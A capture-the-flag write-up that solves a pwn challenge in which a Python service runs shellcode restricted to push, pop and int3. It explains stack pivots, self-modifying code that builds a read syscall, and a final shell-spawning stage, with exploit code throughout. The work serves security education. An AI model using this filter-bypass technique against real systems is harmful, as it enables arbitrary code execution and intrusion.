push pull pops REVENGE

by s1gn3rs

Points: 476 (Dynamic)

Solves: 20

Description:

you aint getting away with it , not on my watch .

Author: buddurid

Given: to_give.zip

TL;DR

We are presented with a Python script that receives our payload and disassembles it as x86-64 instructions. It rejects the payload if it contains any instruction other than int3, pop [register] or push [register]; otherwise it executes our payload.
We solve it by doing two stack pivots, altering our shellcode mid-run, crafting our instructions to execute a read syscall, and sending new shellcode that spawns a shell.

Python script analysis

Code analysis (source code provided)

def main():
    code = input("Shellcode : ")
    code = base64.b64decode(code.encode())
    try:
        if check(code):
            run(code)
        else:
            raise AssertionError("check failed")
    except Exception as e:
        print("Exception type :", type(e)) 
        print("Exception text :", e)       
        
        exit(1)

main() receives our payload, which it expects to be base64-encoded, and uses check(code) to evaluate whether the payload is acceptable. If so, it runs our payload as shellcode; otherwise it raises an AssertionError("check failed").
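As a minimal sketch of the input format, the snippet below base64-encodes a single int3 byte (0xCC), which is the kind of string the service decodes before checking it. The variable names are illustrative and not part of the challenge code.

```python
import base64

# A one-byte payload: int3 (opcode 0xCC), one of the three allowed instructions.
raw_payload = b"\xcc"

# The service reads a base64 string and decodes it back into raw bytes.
encoded = base64.b64encode(raw_payload).decode()
decoded = base64.b64decode(encoded.encode())

print(encoded)
```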

def check(code: bytes):
    if len(code) > 0x2000:
        return False

    md = Cs(CS_ARCH_X86, CS_MODE_64)
    md.detail = True
    code_len=len(code)
    decoded=0
    for insn in md.disasm(code, 0):
        name = insn.insn_name()
        decoded+=insn.size
        if name!="pop" and name!="push" :
            if name=="int3" :
                continue
            return False
        if insn.operands[0].type!=CS_OP_REG:
            return False
    if code_len!=decoded:
        print("nice try")
        return False
        
    return True

check(code) first verifies that our payload does not exceed 0x2000 bytes. It then disassembles our input using Capstone in x86-64 mode, with md.detail = True so that operands can be inspected. Every instruction must be an int3, a pop or a push, and because of the line if insn.operands[0].type!=CS_OP_REG the operand of each pop and push must be a register (so no immediate or memory operands are allowed). Finally, it checks that the length of the original payload matches the total length of the disassembled instructions. This is a mitigation for the previous challenge “push pull pops”, which was very similar but lacked this condition. That version allowed inserting an invalid byte that would stop the disassembler, letting us write instructions other than int3/pop/push after it. With this condition in place we can no longer do that, so we need to build our shellcode exploit purely from those three instructions.
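To get a feel for which bytes survive the filter, here is a rough stand-in for check(code) that needs no Capstone. It is a deliberate simplification and an assumption on my part: it only recognises int3 and the short one-byte push/pop register encodings (with an optional 0x41 prefix for r8 to r15), whereas Capstone also accepts other encodings of push/pop with a register operand. passes_simple_filter is a hypothetical name.

```python
def passes_simple_filter(code: bytes) -> bool:
    """Accept only int3 and the short push/pop register encodings.

    Simplification: the real check uses Capstone, which also accepts other
    encodings of push/pop with a register operand that this sketch rejects.
    """
    if len(code) > 0x2000:
        return False
    i = 0
    while i < len(code):
        byte = code[i]
        if byte == 0xCC:                       # int3
            i += 1
        elif 0x50 <= byte <= 0x5F:             # push/pop rax..rdi
            i += 1
        elif (byte == 0x41 and i + 1 < len(code)
              and 0x50 <= code[i + 1] <= 0x5F):
            i += 2                             # 0x41 prefix: push/pop r8..r15
        else:
            return False                       # anything else is rejected
    return True


# push rcx; push r13; pop rdx; int3
print(passes_simple_filter(bytes([0x51, 0x41, 0x55, 0x5A, 0xCC])))
# syscall (0f 05) is not allowed
print(passes_simple_filter(b"\x0f\x05"))
```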

def run(code: bytes):
    # Allocate executable memory using mmap
    mem = mmap.mmap(-1, len(code), prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
    mem.write(code)
    
    # Create function pointer and execute
    func = ctypes.CFUNCTYPE(ctypes.c_void_p)(ctypes.addressof(ctypes.c_char.from_buffer(mem)))
    func()
    
    exit(1)

The last function is run(code), which, as the name suggests, runs our assembly code: it maps a memory region with read, write and execute permissions, writes our code to it and executes it.

Exploit

Auxiliary Functions

def push(reg):
    return asm(f'push {reg}')

def pop(reg):
    return asm(f'pop {reg}')

int3 = asm('int3')
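For readers without pwntools at hand, the bytes behind these helpers can be sketched by hand. enc_push and enc_pop are hypothetical names, not part of the exploit; they assume the short 0x50+r / 0x58+r opcode forms, with a 0x41 prefix for r8 to r15.

```python
# Register order matches the x86-64 register numbering (0..15).
REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi",
        "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]


def _encode(base_opcode: int, reg: str) -> bytes:
    index = REGS.index(reg)
    prefix = b"\x41" if index >= 8 else b""   # needed for r8..r15
    return prefix + bytes([base_opcode + (index & 7)])


def enc_push(reg: str) -> bytes:
    return _encode(0x50, reg)


def enc_pop(reg: str) -> bytes:
    return _encode(0x58, reg)


INT3 = b"\xcc"

print(enc_push("rcx").hex(), enc_pop("rdx").hex(), enc_push("r13").hex())
```

Note that the legacy registers take one byte each while r8 to r15 take two, which matters later when instructions are packed into 8-byte groups.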

Exploit path

Pivot stack to the heap in order to find a useful instruction.
Pivot stack to mapped memory to alter our shellcode.
Craft a read syscall to the mapped memory and create new instructions.
execve to change process and gain control.

Where we are in the process

By sending just an int3 and using GDB, we can inspect our surroundings.

[Image: GDB output showing the registers and stack at the int3 breakpoint]

Finding a useful value

Note: for now, let’s assume that we can use this value as an instruction to execute.

This was one of the hardest parts: finding a useful instruction (preferably an add [register], [register]). After a while I came to the conclusion that the stack didn’t hold any value of this kind for us to use. (Important: we can’t rely on the bytes of pointers since they change on each run, so we need values that stay at the same relative offset and keep the same value on every run.) So I started searching the heap, since Python makes extensive use of it. After some time I found this value:

[Image: GDB output showing the value found on the heap]

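Though far from perfect, it was something: the value 0x1101 decodes to add DWORD PTR [rcx], edx followed by three add BYTE PTR [rax], al, so it requires rcx and rax to be valid pointers.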
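The payload comments later in this writeup give the heap value as 0x1101. As a small sanity check, the sketch below decodes the 8 bytes of that value by hand. decode_add is a hypothetical helper that only understands the two ADD opcodes needed here (00 and 01) with a plain [register] memory operand; it is not a general disassembler.

```python
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
REG8 = ["al", "cl", "dl", "bl", "ah", "ch", "dh", "bh"]


def decode_add(opcode: int, modrm: int) -> str:
    """Decode 'add [reg64], reg' for opcodes 0x00 and 0x01 only."""
    mod, reg, rm = modrm >> 6, (modrm >> 3) & 7, modrm & 7
    if mod != 0 or rm in (4, 5):
        raise ValueError("addressing mode outside the scope of this sketch")
    if opcode == 0x00:
        return f"add BYTE PTR [{REG64[rm]}], {REG8[reg]}"
    if opcode == 0x01:
        return f"add DWORD PTR [{REG64[rm]}], {REG32[reg]}"
    raise ValueError("opcode outside the scope of this sketch")


# The qword as it sits in memory (little-endian).
raw = (0x1101).to_bytes(8, "little")

# Four two-byte instructions: opcode byte followed by a ModRM byte.
decoded = [decode_add(raw[i], raw[i + 1]) for i in range(0, 8, 2)]
for line in decoded:
    print(line)
```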

Stack pivot

As we can see in the previous stack image, we have two useful pointers, one at [rbp + 0x70] pointing to the beginning of our mapped memory, and another at [rbp + 0x78] pointing to the heap. Even though we have more of these pointers to the heap, this was the closest one to the address of the value found previously.

partialPayload = pop("rcx") * 16 +  pop("rsp")

With this, we store the mapped memory pointer in rcx and perform a stack pivot to the heap.

offsetToAddDwordRcxEdx = 0x420
amountPops = offsetToAddDwordRcxEdx // 8
partialPayload  = pop("r15") * 4 + pop("r13")
partialPayload += pop("r15") * (amountPops + 1 - 5)
partialPayload += push("rcx") + pop("rsp") # r13 = 0xa0, r15 = 0x1101 (add DWORD PTR [rcx], edx)

On the way to the found value we popped r13 in order to store 0xa0; this will reduce the number of additions needed to create the syscall instruction. By the end we have r15 = 0x1101 and r13 = 0xa0, and we can do another stack pivot, this time to the mapped memory.
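The pop count can be double-checked with a little arithmetic. The sketch below mirrors the pop sequence from the snippet above and computes which offset (relative to the pivoted rsp) each pop reads from. The variable names are mine.

```python
OFFSET_TO_VALUE = 0x420                    # offset of the useful value from the pivoted rsp
pops_before_value = OFFSET_TO_VALUE // 8   # qwords that sit before the value

# Same shape as the payload: 4 x r15, 1 x r13, then r15 up to and including the value.
sequence = ["r15"] * 4 + ["r13"] + ["r15"] * (pops_before_value + 1 - 5)

# The i-th pop reads the qword at offset 8 * i.
offsets = [8 * i for i in range(len(sequence))]
r13_offset = offsets[sequence.index("r13")]
last_r15_offset = offsets[-1]

print(len(sequence), hex(r13_offset), hex(last_r15_offset))
```

So r13 is loaded from offset 0x20, and the final pop into r15 lands exactly on offset 0x420.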

Constructing pop and mov instructions

Even though we can use pop and push, we want to write new code with more instructions, and that code has to live in a location different from the one currently being executed, so we need to create these pop and push instructions as data too. Right now we have rsp pointing to our mapped memory region, so we can load the required instruction bytes into registers with simple sequential pops. At first glance we could store a single instruction per 8-byte slot and leave the other bytes set to zero. However, the bytes b"\x00\x00" decode to add BYTE PTR [rax], al, and we may not have a valid pointer in rax when those bytes are executed. So we start our payload with groups of these pops and pushes that fill each 8-byte slot completely, arranged so that executing them does not disturb the current state of the registers.

payloadStart =  push("rcx") * 8 + pop("rcx") * 8 # just trash
payloadStart += push("rsi") * 8 # need to restore rsi at the end
payloadStart += push("rsi") * 8 + pop("rsi") * 8 # push("rsi") and pop("rsi") 8 times
payloadStart += push("rcx") * 4 + pop("rsi") * 4 # push("rcx") and pop("rsi") 4 times
payloadStart += push("rdx") * 8 + pop("rdx") * 8 # push("rdx") and pop("rdx") 8 times
payloadStart += push("rdi") * 8 + pop("rdi") * 8 # push("rdi") and pop("rdi") 8 times
payloadStart += push("rdi") * 4 + pop("rax") * 4 # push("rdi")  and pop("rax") 4 times
payloadStart += push("rdx") * 8 # need to restore rdx at the end
payloadStart += (push("r13") + pop("rdx")) * 2 + push("rdx") + pop("rdx") # ( push("r13") and pop("rdx") ) 2 times + push("rdx") and pop("rdx") once
payloadStart += pop("rdx") * 8 # restoring rdx at the end
payloadStart += pop("rsi") * 8 # restoring rsi at the end

Store new instructions

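We use registers to store the new instructions: with rsp at the start of the mapped memory, each pop loads the next 8 bytes of payloadStart into a register.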

partialPayload = pop("r9") * 4 + pop("r10") # r9 = push("rsi") * 8
partialPayload += pop("r10") # r10 = push("rcx") * 4 + pop("rsi") * 4
partialPayload += pop("r14") + pop("r12") # r14 = 8 * push("rdx") ; r12 = pop("rdx") * 8
partialPayload += pop("r8") + pop("rax") # r8 = push("rdi") * 8
partialPayload += pop("rbx") # rbx = push("rdi")*4 + pop("rax") * 4
partialPayload += pop("rbp") * 2 # rbp = [push("r13") + pop("rdx")] * 2 + push("rdx") + pop("rdx")
partialPayload += push("rdx") + pop("rax") # to have a pointer in rax
# r13 = 0xa0
# r15 = DWORD PTR [rcx], edx ; (add BYTE PTR[rax], al) * 3
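To make the mapping between pops and instruction groups easier to follow, the sketch below rebuilds payloadStart with hand-encoded bytes, splits it into 8-byte chunks and replays the pop sequence. It assumes payloadStart sits at offset 0 of the mapped memory and that rsp points there when the pops start. The push and pop helpers here are stdlib stand-ins for the pwntools-based ones.

```python
REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi",
        "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]


def _enc(base: int, reg: str) -> bytes:
    i = REGS.index(reg)
    return (b"\x41" if i >= 8 else b"") + bytes([base + (i & 7)])


def push(reg: str) -> bytes:
    return _enc(0x50, reg)


def pop(reg: str) -> bytes:
    return _enc(0x58, reg)


# Same layout as payloadStart in the writeup.
start = push("rcx") * 8 + pop("rcx") * 8
start += push("rsi") * 8
start += push("rsi") * 8 + pop("rsi") * 8
start += push("rcx") * 4 + pop("rsi") * 4
start += push("rdx") * 8 + pop("rdx") * 8
start += push("rdi") * 8 + pop("rdi") * 8
start += push("rdi") * 4 + pop("rax") * 4
start += push("rdx") * 8
start += (push("r13") + pop("rdx")) * 2 + push("rdx") + pop("rdx")
start += pop("rdx") * 8
start += pop("rsi") * 8

chunks = [start[i:i + 8] for i in range(0, len(start), 8)]

# Each pop consumes the next chunk; a later pop into the same register overwrites it.
pop_order = (["r9"] * 4 + ["r10"] * 2 +
             ["r14", "r12", "r8", "rax", "rbx"] + ["rbp"] * 2)
regs = {}
for reg, chunk in zip(pop_order, chunks):
    regs[reg] = chunk

for reg in ("r9", "r10", "r14", "r12", "r8", "rbx", "rbp"):
    print(reg, regs[reg].hex())
```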

Constructing syscall

Here there is a catch: we need to move rsp far enough ahead that our writes do not clobber the code around the current rip, and then, because the stack grows towards lower addresses, we need to push our new shellcode from top to bottom, that is, from its last instruction to its first.

# payload += push("rdx") # to align rip when using int3
partialPayload = pop("rcx") * 0x100 +  push("rsp") + pop("rcx") # address to write new instruction

# mov rdx, r13 -> rdx = 0xa0
partialPayload += push("rbp") # [push("r13") + pop("rdx")] * 2 + push("rdx") + pop("rdx") 

# address (top of stack) to write our new shellcode
partialPayload += push("r10") # push("rcx") * 4 + pop("rsi") * 4

# mov rax, rdi  -> rax = 0 (syscall read number)
partialPayload += push("rbx") # push("rdi") * 4 + pop("rax") * 4

# ----- Now this is setting registers and creating syscall
partialPayload += push("r13") + pop("rdx") # rdx = 0xa0

# this creates the syscall instruction, rcx = address to put SYSCALL
partialPayload += push("r14") # 8 pushes of rdx
partialPayload += push("r15") * 15
partialPayload += push("r12")  # 8 pops of rdx
partialPayload += push("r9") # 8 pushes of rsi
partialPayload += push("r15") * 8 # 24 pushes of add    DWORD PTR [rcx],edx
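The "top to bottom" ordering is easy to get backwards, so here is a toy model of it. DownwardStack is a hypothetical class that only mimics how push moves rsp down by 8 and stores a qword. The three chunks are the hand-encoded instruction groups held in rbp, r10 and rbx.

```python
class DownwardStack:
    """Tiny model of a stack that grows towards lower addresses."""

    def __init__(self, size: int):
        self.mem = bytearray(size)
        self.rsp = size                      # start at the top of the buffer

    def push(self, qword: bytes) -> None:
        assert len(qword) == 8
        self.rsp -= 8                        # push first decrements rsp...
        self.mem[self.rsp:self.rsp + 8] = qword   # ...then stores the value


MOV_RDX_R13 = bytes.fromhex("41555a41555a525a")  # (push r13; pop rdx) x2; push rdx; pop rdx
MOV_RSI_RCX = b"\x51" * 4 + b"\x5e" * 4          # push rcx x4; pop rsi x4
MOV_RAX_RDI = b"\x57" * 4 + b"\x58" * 4          # push rdi x4; pop rax x4

stack = DownwardStack(24)
# Pushed in the same order as in the payload: rbp, then r10, then rbx.
for chunk in (MOV_RDX_R13, MOV_RSI_RCX, MOV_RAX_RDI):
    stack.push(chunk)

# Reading memory upwards from rsp gives the order in which the CPU would run it.
code_in_memory = bytes(stack.mem[stack.rsp:])
print(code_in_memory.hex())
```

The chunk pushed last ends up at the lowest address, so it is the first to execute once rip reaches the newly written code.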

Final shellcode

Now that the read syscall lets us write arbitrary bytes to the mapped memory, we just need to send shellcode that pops a shell.

payload = b64encode(payload).decode()
P.sendlineafter(b"Shellcode : ", payload.encode())

# Now the real shellcode to get the flag
shellcode = asm(shellcraft.amd64.linux.sh())

shellcode = b"\x90" * 8 + asm("mov rbp, rsp") + shellcode
P.send(shellcode)
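One thing worth checking is that the second stage fits in the read: rdx was set to 0xa0 earlier, so the syscall reads at most 0xa0 bytes. The sketch below is a hypothetical helper that builds the same prefix by hand (8 NOPs plus mov rbp, rsp, which encodes as 48 89 e5) and refuses a stage that would be truncated. It assumes the read length really is 0xa0 at the time of the syscall.

```python
READ_LIMIT = 0xA0                      # value placed in rdx before the read syscall

NOP_PAD = b"\x90" * 8                  # same padding as in the exploit
MOV_RBP_RSP = b"\x48\x89\xe5"          # mov rbp, rsp


def build_stage(shellcode: bytes) -> bytes:
    """Prefix the shellcode and make sure it fits in a single read."""
    stage = NOP_PAD + MOV_RBP_RSP + shellcode
    if len(stage) > READ_LIMIT:
        raise ValueError(f"stage is {len(stage)} bytes, limit is {READ_LIMIT}")
    return stage


# Room left for the actual shellcode after the fixed prefix.
max_shellcode_len = READ_LIMIT - len(NOP_PAD) - len(MOV_RBP_RSP)
print(max_shellcode_len)
```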

Exploit Code

exploit.py

Flag

Securinets{friendhsip_with_capstone_ended}